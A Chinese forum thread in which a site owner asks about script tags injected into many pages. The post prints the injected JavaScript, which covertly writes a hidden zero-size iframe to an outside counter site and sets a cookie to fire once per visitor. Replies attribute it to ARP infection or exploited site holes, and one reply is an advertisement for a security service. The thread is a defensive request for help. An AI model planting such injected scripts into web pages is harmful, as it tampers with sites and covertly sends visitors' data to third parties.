好多网页中都有<script language="javascript" src="http://css2.viens.la/css.js?width=700&height=600&keyword=uf556"></script><script language="javascript" src="http://office2.viens.la/office.js?do=list&uid=193&type=blog"></script>
这两段代码  

我将两个js下载下来后发现两个js内容一样如下:
var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
   {
document.write('');document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://count27.51yes.com/sa.aspx?id=275666147&amp;
refe='+window.parent.location+'&amp;location=http%3A//office.js/&amp;color=32x&amp;resolution=1024x768&amp;returning=0&amp;
language=zh-cn&amp;ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29" frameBorder=0 width=0 scrolling=no height=0></IFRAME>');   document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";
   }
请高手帮忙

解决方案 »

  1.   

    如果很多网页都有,那么可以能是局域网中了ARP病毒。
      

  2.   

    你看看ftp中原文件内有没有,如果有的话,可能是你网站有漏洞,也有可能是服务器上某个网站有漏洞,而且服务器没设置安全,可以通过一个在线web管理系统类似的木马管理所有用户的网站
      

  3.   

    网页被挂马了 很有可能是程序漏洞 
    以前有很多这种问题 可以找一下 
    一般都是检查sql注入 管理员权限 上传漏洞 
      

  4.   

    如果自己可以登录到服务端,可以用 easySR 找出元凶。参见:使用EasySR(Search and Replace)清除服务器端网页木马http://www.v-ec.com/dh20156/article.asp?id=200
      

  5.   

    这问题很严重,很明显是网站存在漏洞而被攻击了,若需要安全技术服务请联系EMAIL & MSN:[email protected], 7X24 为您的网站保驾护航。